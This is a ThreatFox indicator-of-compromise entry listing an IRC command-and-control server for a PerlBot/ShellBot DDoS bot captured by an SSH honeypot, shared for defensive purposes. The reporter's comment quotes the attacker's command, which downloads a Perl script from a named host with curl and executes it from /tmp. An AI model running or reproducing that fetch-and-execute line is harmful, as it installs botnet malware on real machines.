🤲🏼 NEW | abuse.ch Community Hub! Earn recognition 🏅 for the malware intelligence you share, climb the leaderboards 📈, and connect with like-minded contributors who share your hunting focus 🤝. Ready to unlock your profile? Go to the Community Hub →

ThreatFox IOC Database

You are viewing the ThreatFox database entry for ip:port 23.95.235.108:6667.

Database Entry


IOC ID:1948443
IOC: 23.95.235.108:6667
IOC Type :ip:port
Threat Type :botnet_cc
Malware: PerlBot
Malware alias:ShellBot, DDoS Perl IrcBot
Confidence Level : Confidence level is elevated (75%)
Is compromised? : False
ASN:AS36352 AS-COLOCROSSING
Country:- US
First seen:2026-10-03 10:13:37 UTC
Last seen:never
UUID:a70d858a-bf10-11f1-bd81-42010aa4000a
Reporter ksi_digital
Reward 5 credits from ThreatFox
Tags:cowrie honeypot IRC Perlbot Shellbot
Reference: https://urlhaus.abuse.ch/url/3920026/

Avatar
ksi_digital
Hard-coded IRC C2 of a DDoS Perl IrcBot v2.0 (PerlBot / ShellBot) sample: $server = 23.95.235.108, port 6667, channel #new, admin nick "Dred". Sample sha256 a37649842a47b8456a763c1b4878d08ea7ecee0ea861db2d7588f99f7e180cda (on MalwareBazaar). Delivered to our Cowrie SSH honeypot on 2026-10-03 09:47 UTC by 109.122.254.169 (client SSH-2.0-libssh2_1.4.3, root login), 3 sessions, command: uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://192.227.210.190/dred -o /tmp/dred;perl /tmp/dred . C2 extracted statically from the script; not contacted, liveness not verified.